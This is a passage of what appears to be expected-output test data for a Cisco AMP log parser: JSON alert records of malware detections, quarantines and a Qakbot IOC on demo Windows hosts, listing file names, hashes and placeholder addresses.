"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 3738, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204897366867979", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 6000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 5108, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867971", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 646000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 6470, + "related.hash": [ + 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:57:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411462918168117251", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 103000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411462922463085000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 7590, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:57:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": 
"f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411462918168117252", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 103000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411462922463085000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 8772, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:57:45.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6411462918168117252", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 573000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411462918168117000, + "event.kind": "alert", + "event.module": "cisco", + 
"event.severity": 2, + "file.hash.md5": "a97fb86da4e010974860e5024137b56b", + "file.hash.sha1": "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12", + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 9881, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "a97fb86da4e010974860e5024137b56b", + "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:32:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.GenericKD:Gen.20fu.1201", + "cisco.amp.detection_id": "6411456342573187074", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 589000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411456342573187000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": 
"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "file.name": "11179468.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 11257, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:32:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.12081E6CA3-95.SBX.TG", + "cisco.amp.detection_id": "6411456342573187073", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 558000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411456342573187000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "file.name": "AySxs.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 12514, + "related.hash": [ + 
"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:27:42.000Z", + "cisco.amp.cloud_ioc.description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.", + "cisco.amp.cloud_ioc.short_description": "W32.Qakbot.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 692000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1492784107692000800, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 4, + "event.start": "2021-01-14T12:27:42.000Z", + "file.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "file.name": "cmd.exe", + "file.path": "/C:/Windows/SysWOW64/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 13751, + "process.hash.sha256": 
"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75", + "related.hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:27:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296278, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 268148295, + "event.action": "Threat Detected in Low Prevalence Executable", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1458626002840536600, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "input.type": "log", + "log.offset": 15508, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:19:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": 
"10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 161000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6583861114428195000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 16640, + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:11:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648173, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 27000000, + "event.action": "File Fetch Completed", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264747552596296000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "file.hash.md5": "48a0bf05b9706a00d2a0ff6260412f11", + "file.hash.sha1": "5058b16a86beee96927371210b9a9f682976a50a", + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "file.path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe", + "fileset.name": "amp", + 
"host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 17570, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "48a0bf05b9706a00d2a0ff6260412f11", + "5058b16a86beee96927371210b9a9f682976a50a" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:02:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d1:e2:b6:61:ef:7a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.A280012EEE.in10.tht.Talos", + "cisco.amp.detection_id": "6411444887895408641", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d1:e2:b6:61:ef:7a" + ], + "cisco.amp.timestamp_nanoseconds": 756000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411444887895409000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "a659ff79ef7ffacbd61d4c2641379e44", + "file.hash.sha1": "c235e18bae63d6c4b5daadb833686f943de65a5f", + "file.hash.sha256": "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "file.name": "X4.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_2", + "host.name": "Demo_Qakbot_2", + "host.os.family": "windows", + "host.os.platform": "windows", + 
"host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 18818, + "process.hash.md5": "045451fa238a75305cc26ac982472367", + "process.hash.sha1": "2131cff0959d213cd9a5e8a8ac362d265d5b1316", + "process.hash.sha256": "9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97", + "process.name": "wscript.exe", + "process.pid": 4744, + "related.hash": [ + "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "a659ff79ef7ffacbd61d4c2641379e44", + "c235e18bae63d6c4b5daadb833686f943de65a5f" + ], + "related.hosts": [ + "Demo_Qakbot_2" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:02:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d1:e2:b6:61:ef:7a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411444887895408641", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d1:e2:b6:61:ef:7a" + ], + "cisco.amp.timestamp_nanoseconds": 772000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411444887895409000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_2", + "host.name": "Demo_Qakbot_2", + "input.type": "log", + "log.offset": 20427, + "related.hash": [ + "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62" + ], + "related.hosts": [ + "Demo_Qakbot_2" + ], 
+ "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:58:57.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419187549993959449", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 208000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187549993959000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 21536, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:58:57.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + 
"cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419187549993959449", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 193000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187549993959000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 22729, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 2980, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:58:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + 
"cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419187537109057560", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 853000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187537109058000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 24252, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 2980, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:58:54.000Z", + "cisco.amp.computer.active": 
true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419187537109057560", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 884000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187537109058000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + 